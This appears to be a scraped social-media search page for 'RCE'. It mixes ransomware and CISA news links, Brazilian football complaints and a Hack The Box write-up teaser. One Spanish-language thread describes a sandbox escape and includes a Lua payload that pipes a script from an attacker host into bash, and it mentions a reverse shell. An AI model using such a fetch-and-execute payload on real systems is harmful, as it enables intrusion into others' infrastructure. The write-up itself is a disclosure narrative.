Tathagata M.
Tathagata M. @tatha_gautama ·
#Hacked #Malware #Spyware #Zerodays #Ransomware #RCE #Phishing #CyberAttack ☠️ • » Faster attacks and ‘recovery denial’ ransomware reshape threat landscape csoonline.com/article/414870…
Faster attacks and ‘recovery denial’ ransomware reshape threat landscape

In 2025, attacker dwell time rose, voice phishing topped email phishing, and threat actors increasingly targeted backup and identity systems, according to Mandiant’s latest incident response data.

From csoonline.com
5
Lucas Cunha
Lucas Cunha @Lucascunhasccp ·
Replying to @PedroRenny77
@PedroRenny77 @odio171 @marcobellojr atrasa salario, ta em portal de policia ano sim, ano tambem, atrasa direito de imagem, contrata sem poder pagar, tem envolvimento em portal de noticia com pcc, ta em rce, tem guerra politica que faz qualquer pessoa fora da caixinha sentir vergonha alheia. é lixo
1
13
Luis Guedes
Luis Guedes @luisfguedes ·
Replying to @marcobellojr
@marcobellojr Clube que arrecada 1Bi, pode vender Naming Rights por um valor muito maior do atual, RCE, não esta quebrado., apenas mal administrado
18
7.2K
Charles Quin
Charles Quin @CharlessQuinn ·
Replying to @CharlessQuinn
9/10 Tiempo total: ~3 horas de café y música lo-fi. Script de race → 40 líneas. Payload polyglot → 1 línea mágica. RCE confirmado → screenshot + report listo.
1
12
Charles Quin
Charles Quin @CharlessQuinn ·
Replying to @CharlessQuinn
6/10 Paso 4: Server-side RCE en cloud hardened El template engine (una librería custom 2026 en Go + Lua sandbox) estaba expuesto vía la Lambda. Con el polyglot conseguí que el backend ejecutara código Lua que escapaba la sandbox y hacía os.execute en el container del pod. Payload final que dio RCE (dentro del JSON mutado vía race): ```lua -- Lua injected via polyglot local f = io.popen("curl -s attacker.cloud/shell.sh | bash") f:close() -- + reverse shell a mi VPS (cloudflare tunnel para no tocar egress rules) ``` En menos de 2 segundos tenía una shell interactiva dentro del pod Kubernetes del target. El cloud estaba “hardened” (IMDSv2, network policies, etc.) pero el RCE fue server-side directo en el worker node.
1
3
0xdf
0xdf @0xdf_ ·
Browsed from @hackthebox_eu features Chrome extension analysis and SSRF via a malicious extension, Bash arithmetic injection through -eq evaluation for RCE, and Python pycache bytecode poisoning for root. 0xdf.gitlab.io/2026/03/28/htb…
3
750
UNDERCODE TESTING
UNDERCODE TESTING @UndercodeUpdate ·
🚨 CISA Sounds Alarm: F5 BIG-#IP Flaw Upgraded from Nuisance to Nightmare—Active RCE Exploits Detected + Video undercodetesting.com/cisa-sounds-al…S Educational Purposes!
CISA Sounds Alarm: F5 BIG-IP Flaw Upgraded From Nuisance To Nightmare—Active RCE Exploits Detected...

CISA Sounds Alarm: F5 BIG-IP Flaw Upgraded from Nuisance to Nightmare—Active RCE Exploits Detected + Video - "Undercode Testing": Monitor hackers like a pro.

From undercodetesting.com
1
8